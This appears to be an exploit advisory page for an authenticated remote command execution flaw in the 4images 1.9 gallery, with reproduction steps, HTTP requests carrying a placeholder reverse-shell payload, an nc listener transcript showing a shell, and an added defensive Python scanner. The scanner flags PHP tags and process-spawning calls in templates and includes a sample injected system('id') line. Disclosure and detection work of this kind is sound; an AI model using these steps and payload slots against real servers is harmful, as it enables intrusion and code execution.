Vendor: 4images
By: Andrey Stoykov
CVSS: 9.8 (CRITICAL)
CWE: 78
Vulnerability type: Remote Command Execution (RCE)
Product Name: 4images
Affected Version From: 1.9
Affected Version To: 1.9
Patch Exists: YES
Related CWE:
CPE: 4images
Metasploit:
Other Scripts:
Platforms Tested: Ubuntu 20.04
2020

4images 1.9 – Remote Command Execution (RCE)

A vulnerability in 4images 1.9 allows an authenticated administrator user to execute arbitrary code on the server by saving a malicious template. Template files are included by the PHP front end at request time, so PHP code written into a template through the admin template editor runs as the web server user. To exploit the vulnerability, an attacker must first log in as an administrator user, then browse to General -> Edit Templates -> Select Template Pack -> default_960px -> Load Theme. The attacker then selects the template categories.html and inserts a reverse shell payload. After clicking Save Changes, the attacker browses to http://host/4images/categories.php?cat_id=1 and a reverse shell is established.

Mitigation:

Upgrade to the latest version of 4images 1.9 or apply the patch provided by the vendor.
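Because the weakness is that an HTML template can carry server-side code, a defender can complement the vendor patch with a template-integrity check. The following script is an added example and is not part of the advisory or of the 4images project: it flags template files that contain a PHP open tag or a process-spawning call, and reports any template whose SHA-256 no longer matches a baseline recorded from a clean install. The template path, the sample templates and the baseline hashes below are constructed for illustration; only the regex checks and the hash comparison are the actual technique.

```python
"""Template-integrity check for a PHP gallery such as 4images (added example).

Templates under templates/<pack>/ are expected to be plain HTML with
{placeholder} tags only. Anything that looks like PHP inside them, or any
template whose hash changed since the baseline, is reported for review.
"""
import hashlib
import re
from pathlib import Path

# Assumed install path; adjust for a real deployment.
TEMPLATE_ROOT = Path("/var/www/html/4images/templates")

# '<?php ...' or the short echo tag '<?= ...'; '<?xml' deliberately does not match.
PHP_OPEN_TAG = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)
# Calls that hand control to the OS or evaluate code; none belong in a template.
DANGEROUS_CALLS = re.compile(
    r"\b(?:system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\(",
    re.IGNORECASE,
)


def scan_template(text):
    """Return a list of finding labels for one template's content."""
    findings = []
    if PHP_OPEN_TAG.search(text):
        findings.append("php-open-tag")
    if DANGEROUS_CALLS.search(text):
        findings.append("process-spawn-call")
    return findings


def sha256_text(text):
    return hashlib.sha256(text.encode("utf-8", "surrogateescape")).hexdigest()


def audit_templates(templates, baseline):
    """templates: {relative_path: content}; baseline: {relative_path: sha256 hex}.

    Returns {relative_path: [findings]} for every template that contains
    suspicious code, is missing from the baseline, or differs from it.
    """
    report = {}
    for name, text in sorted(templates.items()):
        findings = scan_template(text)
        if name not in baseline:
            findings.append("not-in-baseline")
        elif baseline[name] != sha256_text(text):
            findings.append("modified-since-baseline")
        if findings:
            report[name] = findings
    return report


def load_templates(root):
    """Read every *.html template under root into the {relative_path: content} shape."""
    return {str(p.relative_to(root)): p.read_text(errors="replace")
            for p in root.rglob("*.html")}


# Constructed sample templates (not real 4images files).
SAMPLE_TEMPLATES = {
    "default_960px/home.html": "<html><body>{header}{content}{footer}</body></html>\n",
    "default_960px/categories.html": "<html>{header}<?php system('id'); ?>{footer}</html>\n",
    "default_960px/details.html": "<html>{header}{details}<!-- tweak -->{footer}</html>\n",
}
# Constructed baseline as recorded from the clean template pack.
SAMPLE_BASELINE = {
    "default_960px/home.html": sha256_text(SAMPLE_TEMPLATES["default_960px/home.html"]),
    "default_960px/categories.html": sha256_text("<html>{header}{categories}{footer}</html>\n"),
    "default_960px/details.html": sha256_text("<html>{header}{details}{footer}</html>\n"),
}

if __name__ == "__main__":
    # For a real install: audit_templates(load_templates(TEMPLATE_ROOT), saved_baseline)
    for name, findings in audit_templates(SAMPLE_TEMPLATES, SAMPLE_BASELINE).items():
        print(f"{name}: {', '.join(findings)}")
```

Run periodically (or from a file-change hook on the templates directory): the categories.html sample is reported for both the PHP tag and the hash mismatch, details.html only for the hash mismatch, and the untouched home.html is silent. A hash-only check catches edits made through the legitimate admin editor too, which is exactly the path this advisory describes, so the baseline should be refreshed only after an administrator reviews the diff.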

Exploit-DB raw data:

# Exploit Title: 4images 1.9 - Remote Command Execution (RCE)
# Exploit Author: Andrey Stoykov
# Software Link: https://www.4homepages.de/download-4images
# Version: 1.9
# Tested on: Ubuntu 20.04


To reproduce do the following:

1. Login as administrator user
2. Browse to "General" -> "Edit Templates" -> "Select Template Pack" -> "default_960px" -> "Load Theme"
3. Select Template "categories.html"
4. Paste reverse shell code
5. Click "Save Changes"
6. Browse to "http://host/4images/categories.php?cat_id=1"


// HTTP POST request showing reverse shell payload

POST /4images/admin/templates.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
[...]

__csrf=c39b7dea0ff15442681362d2a583c7a9&action=savetemplate&content=[REVERSE_SHELL_CODE]&template_file_name=categories.html&template_folder=default_960px[...]



// HTTP GET request to the page that renders the modified template

GET /4images/categories.php?cat_id=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
[...]


# nc -kvlp 4444
listening on [any] 4444 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 43032
Linux kali 6.0.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.0.7-1kali1 (2022-11-07) x86_64 GNU/Linux
 13:54:28 up  2:18,  2 users,  load average: 0.09, 0.68, 0.56
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
kali     tty7     :0               11:58    2:18m  2:21   0.48s xfce4-session
kali     pts/1    -                11:58    1:40  24.60s  0.14s sudo su
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ 